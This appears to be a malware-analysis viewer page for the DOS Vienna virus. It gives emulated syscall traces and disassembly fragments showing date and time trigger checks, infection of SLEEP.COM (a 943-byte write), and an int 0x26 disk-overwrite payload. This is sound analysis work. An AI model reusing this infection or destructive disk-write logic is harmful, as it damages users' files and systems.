Sample viewer

vx.netlux.org/Virus.DOS.Vienna.943

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:24:51.016240659Z 255 PC: 12a4a | UNKNOWN!
2018-12-17T22:24:51.017364941Z 48 PC: 12a6a | Get DOS version
2018-12-17T22:24:51.019279818Z 44 PC: 12a76 | Get time 0x12a76: xor bx, bx
0x12a78: cmp dl, 4
0x12a7b: jle 0x12a7f
0x12a7d: jmp 0x12a91
0x12a7f: mov dl, byte ptr [bx + si + 0x8f]
0x12a83: or dl, dl
0x12a85: je 0x12a91
0x12a87: sub dl, 0x4b
0x12a8a: mov ah, 2
0x12a8c: int 0x21
0x12a8e: inc bx
0x12a8f: jmp 0x12a7f
0x12a91: mov ah, 0x2a
0x12a93: int 0x21
0x12a95: cmp dh, 3
0x12a98: jne 0x12ada
0x12a9a: cmp dl, 0x18
0x12a9d: jne 0x12ada
0x12a9f: mov ah, 0x2c
0x12aa1: int 0x21
2018-12-17T22:24:51.021925198Z 42 PC: 12a95 | Get date 0x12a95: cmp dh, 3
0x12a98: jne 0x12ada
0x12a9a: cmp dl, 0x18
0x12a9d: jne 0x12ada
0x12a9f: mov ah, 0x2c
0x12aa1: int 0x21
0x12aa3: cmp ch, 7
0x12aa6: jne 0x12ada
0x12aa8: cmp cl, 0x2d
0x12aab: jne 0x12ada
0x12aad: xor bx, bx
0x12aaf: mov dl, byte ptr [bx + si + 0xf1]
0x12ab3: or dl, dl
0x12ab5: je 0x12ac1
0x12ab7: sub dl, 0x4b
0x12aba: mov ah, 2
0x12abc: int 0x21
0x12abe: inc bx
0x12abf: jmp 0x12aaf
0x12ac1: mov al, 0
2018-12-17T22:24:51.024566684Z 47 PC: 12adf | Get disk transfer address
2018-12-17T22:24:51.027355254Z 26 PC: 12af4 | Set disk transfer address
2018-12-17T22:24:51.02885576Z 78 PC: 12b88 | Find first file
2018-12-17T22:24:51.035561371Z 67 PC: 12bca | Get or set file attributes
2018-12-17T22:24:51.047394429Z 67 PC: 12bde | Get or set file attributes
2018-12-17T22:24:51.065366106Z 61 PC: 12beb | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:24:51.072598967Z 87 PC: 12bf8 | Get or set file date and time
2018-12-17T22:24:51.074790541Z 63 PC: 12c0f | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:24:51.082057939Z 66 PC: 12c20 | Move file pointer
2018-12-17T22:24:51.083736308Z 64 PC: 12c47 | Write file or device (Write 943 bytes on handle 5)
2018-12-17T22:24:51.093294473Z 66 PC: 12c58 | Move file pointer
2018-12-17T22:24:51.095262542Z 64 PC: 12c69 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:24:51.107428516Z 87 PC: 12c7f | Get or set file date and time
2018-12-17T22:24:51.109187841Z 62 PC: 12c84 | Close file
2018-12-17T22:24:51.120828203Z 67 PC: 12c95 | Get or set file attributes
2018-12-17T22:24:51.135414402Z 26 PC: 12ca4 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":4391,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:51:37.006309607Z 255 PC: 12a4a | UNKNOWN!
2018-12-25T11:51:37.007353409Z 48 PC: 12a6a | Get DOS version
2018-12-25T11:51:37.009458053Z 44 PC: 12a76 | Get time 0x12a76: xor bx, bx
0x12a78: cmp dl, 4
0x12a7b: jle 0x12a7f
0x12a7d: jmp 0x12a91
0x12a7f: mov dl, byte ptr [bx + si + 0x8f]
0x12a83: or dl, dl
0x12a85: je 0x12a91
0x12a87: sub dl, 0x4b
0x12a8a: mov ah, 2
0x12a8c: int 0x21
0x12a8e: inc bx
0x12a8f: jmp 0x12a7f
0x12a91: mov ah, 0x2a
0x12a93: int 0x21
0x12a95: cmp dh, 3
0x12a98: jne 0x12ada
0x12a9a: cmp dl, 0x18
0x12a9d: jne 0x12ada
0x12a9f: mov ah, 0x2c
0x12aa1: int 0x21
2018-12-25T11:51:37.011455468Z 42 PC: 12a95 | Get date 0x12a95: cmp dh, 3
0x12a98: jne 0x12ada
0x12a9a: cmp dl, 0x18
0x12a9d: jne 0x12ada
0x12a9f: mov ah, 0x2c
0x12aa1: int 0x21
0x12aa3: cmp ch, 7
0x12aa6: jne 0x12ada
0x12aa8: cmp cl, 0x2d
0x12aab: jne 0x12ada
0x12aad: xor bx, bx
0x12aaf: mov dl, byte ptr [bx + si + 0xf1]
0x12ab3: or dl, dl
0x12ab5: je 0x12ac1
0x12ab7: sub dl, 0x4b
0x12aba: mov ah, 2
0x12abc: int 0x21
0x12abe: inc bx
0x12abf: jmp 0x12aaf
0x12ac1: mov al, 0
2018-12-25T11:51:37.013969087Z 47 PC: 12adf | Get disk transfer address
2018-12-25T11:51:37.016104245Z 26 PC: 12af4 | Set disk transfer address
2018-12-25T11:51:37.01734704Z 78 PC: 12b88 | Find first file
2018-12-25T11:51:37.023452119Z 67 PC: 12bca | Get or set file attributes
2018-12-25T11:51:37.030737382Z 67 PC: 12bde | Get or set file attributes
2018-12-25T11:51:37.05557461Z 61 PC: 12beb | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:51:37.062299308Z 87 PC: 12bf8 | Get or set file date and time
2018-12-25T11:51:37.063908823Z 63 PC: 12c0f | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:51:37.069300905Z 66 PC: 12c20 | Move file pointer
2018-12-25T11:51:37.071286641Z 64 PC: 12c47 | Write file or device (Write 943 bytes on handle 5)
2018-12-25T11:51:37.091143775Z 66 PC: 12c58 | Move file pointer
2018-12-25T11:51:37.093535763Z 64 PC: 12c69 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:51:37.101172579Z 87 PC: 12c7f | Get or set file date and time
2018-12-25T11:51:37.102890804Z 62 PC: 12c84 | Close file
2018-12-25T11:51:37.111693122Z 67 PC: 12c95 | Get or set file attributes
2018-12-25T11:51:37.124307933Z 26 PC: 12ca4 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":3,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":4391,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:51:37.020173289Z 255 PC: 12a4a | UNKNOWN!
2018-12-25T11:51:37.021683629Z 48 PC: 12a6a | Get DOS version
2018-12-25T11:51:37.022754183Z 44 PC: 12a76 | Get time 0x12a76: xor bx, bx
0x12a78: cmp dl, 4
0x12a7b: jle 0x12a7f
0x12a7d: jmp 0x12a91
0x12a7f: mov dl, byte ptr [bx + si + 0x8f]
0x12a83: or dl, dl
0x12a85: je 0x12a91
0x12a87: sub dl, 0x4b
0x12a8a: mov ah, 2
0x12a8c: int 0x21
0x12a8e: inc bx
0x12a8f: jmp 0x12a7f
0x12a91: mov ah, 0x2a
0x12a93: int 0x21
0x12a95: cmp dh, 3
0x12a98: jne 0x12ada
0x12a9a: cmp dl, 0x18
0x12a9d: jne 0x12ada
0x12a9f: mov ah, 0x2c
0x12aa1: int 0x21
2018-12-25T11:51:37.024720471Z 42 PC: 12a95 | Get date 0x12a95: cmp dh, 3
0x12a98: jne 0x12ada
0x12a9a: cmp dl, 0x18
0x12a9d: jne 0x12ada
0x12a9f: mov ah, 0x2c
0x12aa1: int 0x21
0x12aa3: cmp ch, 7
0x12aa6: jne 0x12ada
0x12aa8: cmp cl, 0x2d
0x12aab: jne 0x12ada
0x12aad: xor bx, bx
0x12aaf: mov dl, byte ptr [bx + si + 0xf1]
0x12ab3: or dl, dl
0x12ab5: je 0x12ac1
0x12ab7: sub dl, 0x4b
0x12aba: mov ah, 2
0x12abc: int 0x21
0x12abe: inc bx
0x12abf: jmp 0x12aaf
0x12ac1: mov al, 0
2018-12-25T11:51:37.027171058Z 47 PC: 12adf | Get disk transfer address
2018-12-25T11:51:37.0282952Z 26 PC: 12af4 | Set disk transfer address
2018-12-25T11:51:37.029885688Z 78 PC: 12b88 | Find first file
2018-12-25T11:51:37.037036048Z 67 PC: 12bca | Get or set file attributes
2018-12-25T11:51:37.042583104Z 67 PC: 12bde | Get or set file attributes
2018-12-25T11:51:37.591796265Z 61 PC: 12beb | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:51:37.60519076Z 87 PC: 12bf8 | Get or set file date and time
2018-12-25T11:51:37.60763789Z 63 PC: 12c0f | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:51:37.613909345Z 66 PC: 12c20 | Move file pointer
2018-12-25T11:51:37.615287369Z 64 PC: 12c47 | Write file or device (Write 943 bytes on handle 5)
2018-12-25T11:51:37.624546837Z 66 PC: 12c58 | Move file pointer
2018-12-25T11:51:37.626213892Z 64 PC: 12c69 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:51:37.633300342Z 87 PC: 12c7f | Get or set file date and time
2018-12-25T11:51:37.635303946Z 62 PC: 12c84 | Close file
2018-12-25T11:51:37.643817553Z 67 PC: 12c95 | Get or set file attributes
2018-12-25T11:51:37.656289041Z 26 PC: 12ca4 | Set disk transfer address

{"DateBased":true,"Day":24,"Month":3,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":4391,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:51:37.045589974Z 255 PC: 12a4a | UNKNOWN!
2018-12-25T11:51:37.046487067Z 48 PC: 12a6a | Get DOS version
2018-12-25T11:51:37.047859329Z 44 PC: 12a76 | Get time 0x12a76: xor bx, bx
0x12a78: cmp dl, 4
0x12a7b: jle 0x12a7f
0x12a7d: jmp 0x12a91
0x12a7f: mov dl, byte ptr [bx + si + 0x8f]
0x12a83: or dl, dl
0x12a85: je 0x12a91
0x12a87: sub dl, 0x4b
0x12a8a: mov ah, 2
0x12a8c: int 0x21
0x12a8e: inc bx
0x12a8f: jmp 0x12a7f
0x12a91: mov ah, 0x2a
0x12a93: int 0x21
0x12a95: cmp dh, 3
0x12a98: jne 0x12ada
0x12a9a: cmp dl, 0x18
0x12a9d: jne 0x12ada
0x12a9f: mov ah, 0x2c
0x12aa1: int 0x21
2018-12-25T11:51:37.049867722Z 42 PC: 12a95 | Get date 0x12a95: cmp dh, 3
0x12a98: jne 0x12ada
0x12a9a: cmp dl, 0x18
0x12a9d: jne 0x12ada
0x12a9f: mov ah, 0x2c
0x12aa1: int 0x21
0x12aa3: cmp ch, 7
0x12aa6: jne 0x12ada
0x12aa8: cmp cl, 0x2d
0x12aab: jne 0x12ada
0x12aad: xor bx, bx
0x12aaf: mov dl, byte ptr [bx + si + 0xf1]
0x12ab3: or dl, dl
0x12ab5: je 0x12ac1
0x12ab7: sub dl, 0x4b
0x12aba: mov ah, 2
0x12abc: int 0x21
0x12abe: inc bx
0x12abf: jmp 0x12aaf
0x12ac1: mov al, 0
2018-12-25T11:51:37.05146973Z 44 PC: 12aa3 | Get time 0x12aa3: cmp ch, 7
0x12aa6: jne 0x12ada
0x12aa8: cmp cl, 0x2d
0x12aab: jne 0x12ada
0x12aad: xor bx, bx
0x12aaf: mov dl, byte ptr [bx + si + 0xf1]
0x12ab3: or dl, dl
0x12ab5: je 0x12ac1
0x12ab7: sub dl, 0x4b
0x12aba: mov ah, 2
0x12abc: int 0x21
0x12abe: inc bx
0x12abf: jmp 0x12aaf
0x12ac1: mov al, 0
0x12ac3: mov cx, 0xff
0x12ac6: mov dx, 1
0x12ac9: int 0x26
0x12acb: jb 0x12ad0
0x12acd: add sp, 2
0x12ad0: inc al
2018-12-25T11:51:37.054330933Z 47 PC: 12adf | Get disk transfer address
2018-12-25T11:51:37.057925928Z 26 PC: 12af4 | Set disk transfer address
2018-12-25T11:51:37.059547517Z 78 PC: 12b88 | Find first file
2018-12-25T11:51:37.074003296Z 67 PC: 12bca | Get or set file attributes
2018-12-25T11:51:37.085908201Z 67 PC: 12bde | Get or set file attributes
2018-12-25T11:51:37.107700314Z 61 PC: 12beb | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:51:37.115284712Z 87 PC: 12bf8 | Get or set file date and time
2018-12-25T11:51:37.116783943Z 63 PC: 12c0f | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:51:37.123540393Z 66 PC: 12c20 | Move file pointer
2018-12-25T11:51:37.125008253Z 64 PC: 12c47 | Write file or device (Write 943 bytes on handle 5)
2018-12-25T11:51:37.1347034Z 66 PC: 12c58 | Move file pointer
2018-12-25T11:51:37.137041476Z 64 PC: 12c69 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:51:37.144006841Z 87 PC: 12c7f | Get or set file date and time
2018-12-25T11:51:37.146270904Z 62 PC: 12c84 | Close file
2018-12-25T11:51:37.15477719Z 67 PC: 12c95 | Get or set file attributes
2018-12-25T11:51:37.165345611Z 26 PC: 12ca4 | Set disk transfer address